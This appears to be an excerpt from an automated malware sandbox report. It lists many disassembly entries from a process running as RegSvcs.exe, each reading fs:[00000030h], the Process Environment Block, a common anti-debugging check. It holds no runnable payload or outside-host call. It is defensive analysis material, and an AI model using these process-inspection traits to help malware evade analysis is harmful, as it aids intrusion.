                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE5CF mov eax, dword ptr fs:[00000030h]15_2_00ECE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE5CF mov eax, dword ptr fs:[00000030h]15_2_00ECE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E965D0 mov eax, dword ptr fs:[00000030h]15_2_00E965D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA5D0 mov eax, dword ptr fs:[00000030h]15_2_00ECA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA5D0 mov eax, dword ptr fs:[00000030h]15_2_00ECA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F105A7 mov eax, dword ptr fs:[00000030h]15_2_00F105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F105A7 mov eax, dword ptr fs:[00000030h]15_2_00F105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F105A7 mov eax, dword ptr fs:[00000030h]15_2_00F105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB45B1 mov eax, dword ptr fs:[00000030h]15_2_00EB45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB45B1 mov eax, dword ptr fs:[00000030h]15_2_00EB45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC4588 mov eax, dword ptr fs:[00000030h]15_2_00EC4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E92582 mov eax, dword ptr fs:[00000030h]15_2_00E92582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E92582 mov ecx, dword ptr fs:[00000030h]15_2_00E92582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE59C mov eax, dword ptr fs:[00000030h]15_2_00ECE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC656A mov eax, dword ptr fs:[00000030h]15_2_00EC656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC656A mov eax, dword ptr fs:[00000030h]15_2_00EC656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC656A mov eax, dword ptr fs:[00000030h]15_2_00EC656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E98550 mov eax, dword ptr fs:[00000030h]15_2_00E98550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E98550 mov eax, dword ptr fs:[00000030h]15_2_00E98550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE53E mov eax, dword ptr fs:[00000030h]15_2_00EBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE53E mov eax, dword ptr fs:[00000030h]15_2_00EBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE53E mov eax, dword ptr fs:[00000030h]15_2_00EBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE53E mov eax, dword ptr fs:[00000030h]15_2_00EBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE53E mov eax, dword ptr fs:[00000030h]15_2_00EBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0535 mov eax, dword ptr fs:[00000030h]15_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0535 mov eax, dword ptr fs:[00000030h]15_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0535 mov eax, dword ptr fs:[00000030h]15_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0535 mov eax, dword ptr fs:[00000030h]15_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0535 mov eax, dword ptr fs:[00000030h]15_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0535 mov eax, dword ptr fs:[00000030h]15_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F26500 mov eax, dword ptr fs:[00000030h]15_2_00F26500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F106F1 mov eax, dword ptr fs:[00000030h]15_2_00F106F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F106F1 mov eax, dword ptr fs:[00000030h]15_2_00F106F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E6F2 mov eax, dword ptr fs:[00000030h]15_2_00F0E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E6F2 mov eax, dword ptr fs:[00000030h]15_2_00F0E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E6F2 mov eax, dword ptr fs:[00000030h]15_2_00F0E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E6F2 mov eax, dword ptr fs:[00000030h]15_2_00F0E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA6C7 mov ebx, dword ptr fs:[00000030h]15_2_00ECA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA6C7 mov eax, dword ptr fs:[00000030h]15_2_00ECA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC6A6 mov eax, dword ptr fs:[00000030h]15_2_00ECC6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC66B0 mov eax, dword ptr fs:[00000030h]15_2_00EC66B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E94690 mov eax, dword ptr fs:[00000030h]15_2_00E94690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E94690 mov eax, dword ptr fs:[00000030h]15_2_00E94690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA660 mov eax, dword ptr fs:[00000030h]15_2_00ECA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA660 mov eax, dword ptr fs:[00000030h]15_2_00ECA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC2674 mov eax, dword ptr fs:[00000030h]15_2_00EC2674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5866E mov eax, dword ptr fs:[00000030h]15_2_00F5866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5866E mov eax, dword ptr fs:[00000030h]15_2_00F5866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAC640 mov eax, dword ptr fs:[00000030h]15_2_00EAC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9262C mov eax, dword ptr fs:[00000030h]15_2_00E9262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC6620 mov eax, dword ptr fs:[00000030h]15_2_00EC6620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC8620 mov eax, dword ptr fs:[00000030h]15_2_00EC8620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAE627 mov eax, dword ptr fs:[00000030h]15_2_00EAE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2619 mov eax, dword ptr fs:[00000030h]15_2_00ED2619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E609 mov eax, dword ptr fs:[00000030h]15_2_00F0E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB27ED mov eax, dword ptr fs:[00000030h]15_2_00EB27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB27ED mov eax, dword ptr fs:[00000030h]15_2_00EB27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB27ED mov eax, dword ptr fs:[00000030h]15_2_00EB27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1E7E1 mov eax, dword ptr fs:[00000030h]15_2_00F1E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E947FB mov eax, dword ptr fs:[00000030h]15_2_00E947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E947FB mov eax, dword ptr fs:[00000030h]15_2_00E947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9C7C0 mov eax, dword ptr fs:[00000030h]15_2_00E9C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F107C3 mov eax, dword ptr fs:[00000030h]15_2_00F107C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E907AF mov eax, dword ptr fs:[00000030h]15_2_00E907AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F447A0 mov eax, dword ptr fs:[00000030h]15_2_00F447A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3678E mov eax, dword ptr fs:[00000030h]15_2_00F3678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E98770 mov eax, dword ptr fs:[00000030h]15_2_00E98770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC674D mov esi, dword ptr fs:[00000030h]15_2_00EC674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC674D mov eax, dword ptr fs:[00000030h]15_2_00EC674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC674D mov eax, dword ptr fs:[00000030h]15_2_00EC674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F14755 mov eax, dword ptr fs:[00000030h]15_2_00F14755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1E75D mov eax, dword ptr fs:[00000030h]15_2_00F1E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E90750 mov eax, dword ptr fs:[00000030h]15_2_00E90750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2750 mov eax, dword ptr fs:[00000030h]15_2_00ED2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2750 mov eax, dword ptr fs:[00000030h]15_2_00ED2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0C730 mov eax, dword ptr fs:[00000030h]15_2_00F0C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC720 mov eax, dword ptr fs:[00000030h]15_2_00ECC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC720 mov eax, dword ptr fs:[00000030h]15_2_00ECC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC273C mov eax, dword ptr fs:[00000030h]15_2_00EC273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC273C mov ecx, dword ptr fs:[00000030h]15_2_00EC273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC273C mov eax, dword ptr fs:[00000030h]15_2_00EC273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC700 mov eax, dword ptr fs:[00000030h]15_2_00ECC700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E90710 mov eax, dword ptr fs:[00000030h]15_2_00E90710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC0710 mov eax, dword ptr fs:[00000030h]15_2_00EC0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5A8E4 mov eax, dword ptr fs:[00000030h]15_2_00F5A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC8F9 mov eax, dword ptr fs:[00000030h]15_2_00ECC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC8F9 mov eax, dword ptr fs:[00000030h]15_2_00ECC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE8C0 mov eax, dword ptr fs:[00000030h]15_2_00EBE8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1C89D mov eax, dword ptr fs:[00000030h]15_2_00F1C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E90887 mov eax, dword ptr fs:[00000030h]15_2_00E90887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F26870 mov eax, dword ptr fs:[00000030h]15_2_00F26870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F26870 mov eax, dword ptr fs:[00000030h]15_2_00F26870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1E872 mov eax, dword ptr fs:[00000030h]15_2_00F1E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1E872 mov eax, dword ptr fs:[00000030h]15_2_00F1E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA2840 mov ecx, dword ptr fs:[00000030h]15_2_00EA2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E94859 mov eax, dword ptr fs:[00000030h]15_2_00E94859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E94859 mov eax, dword ptr fs:[00000030h]15_2_00E94859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EC0854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3483A mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00ECA830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EB2835 mov eax, dword ptr fs:[00000030h] (x5); mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1C810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1E9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EC29F9 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F5A9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F269C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9A9D0 mov eax, dword ptr fs:[00000030h] (x6)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EC49D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F189B3 mov esi, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E909AD mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h] (x13)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00ED096E mov eax, dword ptr fs:[00000030h] (x2); mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EB6962 mov eax, dword ptr fs:[00000030h] (x3)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F34978 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1C97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F10946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F2892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1C912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E88918 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F0E908 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00ECAAEE mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EE6ACC mov eax, dword ptr fs:[00000030h] (x3)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E90AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EC4AD0 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E98AA0 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EE6AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9EA80 mov eax, dword ptr fs:[00000030h] (x9)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F64A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EC8A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F0CA72 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00ECCA6F mov eax, dword ptr fs:[00000030h] (x3)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3EA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA0A5B mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E96A50 mov eax, dword ptr fs:[00000030h] (x7)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EBEA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00ECCA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00ECCA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EB4A35 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1CA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1CBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EBEBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E98BF0 mov eax, dword ptr fs:[00000030h] (x3)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EB0BCB mov eax, dword ptr fs:[00000030h] (x3)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3EBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E90BCD mov eax, dword ptr fs:[00000030h] (x3)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F44BB0 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EA0BBE mov eax, dword ptr fs:[00000030h] (x2)
